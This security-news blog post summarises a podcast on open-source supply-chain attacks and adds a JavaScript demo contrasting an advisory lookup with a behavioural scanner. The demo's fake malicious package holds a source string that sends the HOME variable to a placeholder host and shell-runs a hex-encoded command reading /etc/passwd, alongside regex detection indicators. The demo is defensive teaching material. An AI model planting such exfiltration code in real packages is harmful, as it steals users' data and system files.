Security News
Application Security
Sarah Gooding
February 6, 2024
Socket CEO Feross Aboukhadijeh was recently a guest on the CyberBytes podcast with host Steffan Foley, where they discussed open source software and the common mistakes companies make in supply chain security.
Feross highlighted the pressure developers face to ship features rapidly, often without full awareness of the open source code they are pulling in. Security teams don't want to slow developers down, but they are struggling to secure dependency trees that routinely run to thousands of packages: source code that almost nobody reads.
The inspiration for Socket came from Feross' experience building the Wormhole app, which has more than 1,000 dependencies. He interviewed more than 40 CISOs about how they vet their open source dependencies for supply chain attacks and found that most were still tethered to traditional software composition analysis (SCA) tools, which only match packages against a database of already-known vulnerabilities and therefore have nothing to say about a newly published malicious package. That is why Socket was designed to drill down into the code of each dependency and analyze it for malicious behavior.
This podcast episode explores the hacker mindset and the difficult problem of defending against threat actors who are naturally inclined to poke at systems. Open source security is going through a major shift toward a more proactive approach, as companies can no longer afford to focus on vulnerabilities to the exclusion of supply chain attacks.
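To make the contrast concrete, here is an added example (not code from the podcast, from Socket, or from the Wormhole project) that runs two checks over a small, constructed npm-style dependency tree: a known-vulnerability lookup of the kind a traditional SCA tool performs, and a crude behavioural scan for the signals a code-level analysis would look for (install scripts, shell execution, network access, environment reads, hex-encoded strings). Every package name, version, advisory identifier, and source snippet is invented for the illustration; the indicator list is a hypothetical minimal set, not a description of any product's rules.

```javascript
// Added example, not Socket's code. All packages, versions, advisories and
// sources below are constructed for illustration.

// Constructed lockfile-style graph: name -> { version, deps, scripts, source }.
const PACKAGES = {
  "app":        { version: "1.0.0", deps: ["left-fmt", "color-util"], scripts: {}, source: "" },
  "left-fmt":   { version: "2.3.1", deps: ["tiny-pad"], scripts: {},
                  source: "module.exports = s => s.trim();" },
  "tiny-pad":   { version: "0.1.0", deps: [], scripts: {},
                  source: "module.exports = (s, n) => s.padStart(n);" },
  // A freshly published malicious package: no advisory exists for it yet.
  "color-util": { version: "4.0.2", deps: ["tiny-pad"],
                  scripts: { postinstall: "node setup.js" },
                  source: "const cp=require('child_process');const h=require('https');" +
                          "h.get('https://example.invalid/c?u='+process.env.HOME);" +
                          "cp.exec(Buffer.from('636174202f6574632f706173737764','hex').toString());" },
};

// Constructed advisory database, the only thing a known-vulnerability check consults.
const ADVISORIES = [
  { name: "tiny-pad", version: "0.1.0", id: "EXAMPLE-0001", summary: "prototype pollution (constructed)" },
];

// Walk the transitive dependency tree from root; returns the set of dependency names.
function transitiveDeps(root, graph = PACKAGES) {
  const seen = new Set();
  const stack = [root];
  while (stack.length) {
    const name = stack.pop();
    if (seen.has(name)) continue;
    seen.add(name);
    for (const d of graph[name]?.deps ?? []) stack.push(d);
  }
  seen.delete(root);
  return seen;
}

// Traditional SCA-style check: flags only name/version pairs present in ADVISORIES.
function knownVulnFindings(root, graph = PACKAGES, advisories = ADVISORIES) {
  const out = [];
  for (const name of transitiveDeps(root, graph)) {
    const version = graph[name].version;
    for (const a of advisories) {
      if (a.name === name && a.version === version) out.push({ name, id: a.id });
    }
  }
  return out;
}

// Hypothetical behavioural indicators applied to each package's manifest and source.
const INDICATORS = [
  { id: "install-script",
    test: p => ["preinstall", "install", "postinstall"].some(k => k in (p.scripts || {})) },
  { id: "shell-exec", test: p => /require\(['"]child_process['"]\)/.test(p.source) },
  { id: "network",    test: p => /require\(['"](https?|net|dns)['"]\)/.test(p.source) },
  { id: "env-read",   test: p => /process\.env/.test(p.source) },
  { id: "hex-encoded-string",
    test: p => /Buffer\.from\(['"][0-9a-f]{16,}['"],\s*['"]hex['"]\)/.test(p.source) },
];

// Code-level check: reports every dependency that trips at least one indicator.
function behaviourFindings(root, graph = PACKAGES) {
  const out = [];
  for (const name of transitiveDeps(root, graph)) {
    const hits = INDICATORS.filter(i => i.test(graph[name])).map(i => i.id);
    if (hits.length) out.push({ name, indicators: hits });
  }
  return out;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("transitive deps:", [...transitiveDeps("app")]);
  console.log("known vulnerabilities:", knownVulnFindings("app"));
  console.log("behavioural findings:", behaviourFindings("app"));
}
```

Run with `node` and compare the two result sets: the advisory lookup reports `tiny-pad` and nothing else, while the behavioural scan is the only check that notices `color-util`, the package that runs an install script, shells out, reads the environment and phones home, because no advisory for it exists. Real dependency trees are far larger and real malware is less obvious than this, but the gap between the two approaches is the one the podcast discusses.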
Check out the episode on Spotify or watch the video on YouTube.